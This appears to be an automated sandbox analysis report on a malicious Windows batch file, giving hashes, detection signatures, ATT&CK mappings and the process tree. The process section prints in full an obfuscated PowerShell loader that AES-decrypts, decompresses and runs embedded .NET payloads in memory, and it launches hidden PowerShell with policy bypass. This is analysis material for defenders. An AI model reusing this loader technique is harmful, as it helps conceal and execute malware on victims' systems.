Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    24-05-2024 17:46

General

  • Target

    m16XClientn.bat

  • Size

    60KB

  • MD5

    322ea0b2359b53869e96a92ce89f0d9e

  • SHA1

    c175334e858e2e6761202e7546201b26faefb911

  • SHA256

    9eb06cfb9cd881338d93b6e2cad6e6a4bd823c44d0128a047e85fa14f278e76c

  • SHA512

    080bb6189372bf55e533923a8f7cad393ecaccccff23ce578efe7104cc76779320faa43aa6b27fc43e63e0ea15f246ff38fccc91b5ebe6c5d4476daabde38c8f

  • SSDEEP

    1536:qHRDZwBvoIeYCOoeK9PlcXmmHaoifEJ0SzAw:qHRDZwRN0cXGcJ0xw

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\m16XClientn.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2156
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B9b88R1T4CVo1WoTI+/W1BysqGk+qehh5RByOsn7XiU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lcCPo+xF8g8/Cxxizm+V4A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $rkxQO=New-Object System.IO.MemoryStream(,$param_var); $FvJOV=New-Object System.IO.MemoryStream; $OPzQw=New-Object System.IO.Compression.GZipStream($rkxQO, [IO.Compression.CompressionMode]::Decompress); $OPzQw.CopyTo($FvJOV); $OPzQw.Dispose(); $rkxQO.Dispose(); $FvJOV.Dispose(); $FvJOV.ToArray();}function execute_function($param_var,$param2_var){ $dLJDy=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rrYOP=$dLJDy.EntryPoint; $rrYOP.Invoke($null, $param2_var);}$MGRmn = 'C:\Users\Admin\AppData\Local\Temp\m16XClientn.bat';$host.UI.RawUI.WindowTitle = $MGRmn;$RZrKP=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($MGRmn).Split([Environment]::NewLine);foreach ($kOWJS in $RZrKP) { if ($kOWJS.StartsWith('vGMencdustGzyGaJrmyt')) { $UphAS=$kOWJS.Substring(20); break; }}$payloads_var=[string[]]$UphAS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
      2⤵
        PID:2240
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1184

    Network

    MITRE ATT&CK Matrix ATT&CK v13

    Execution

    Command and Scripting Interpreter

    1
    T1059

    PowerShell

    1
    T1059.001

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1184-4-0x000007FEF592E000-0x000007FEF592F000-memory.dmp
      Filesize

      4KB

    • memory/1184-5-0x000000001B6B0000-0x000000001B992000-memory.dmp
      Filesize

      2.9MB

    • memory/1184-7-0x000007FEF5670000-0x000007FEF600D000-memory.dmp
      Filesize

      9.6MB

    • memory/1184-6-0x0000000001D10000-0x0000000001D18000-memory.dmp
      Filesize

      32KB

    • memory/1184-8-0x000007FEF5670000-0x000007FEF600D000-memory.dmp
      Filesize

      9.6MB

    • memory/1184-9-0x000007FEF5670000-0x000007FEF600D000-memory.dmp
      Filesize

      9.6MB

    • memory/1184-10-0x000007FEF5670000-0x000007FEF600D000-memory.dmp
      Filesize

      9.6MB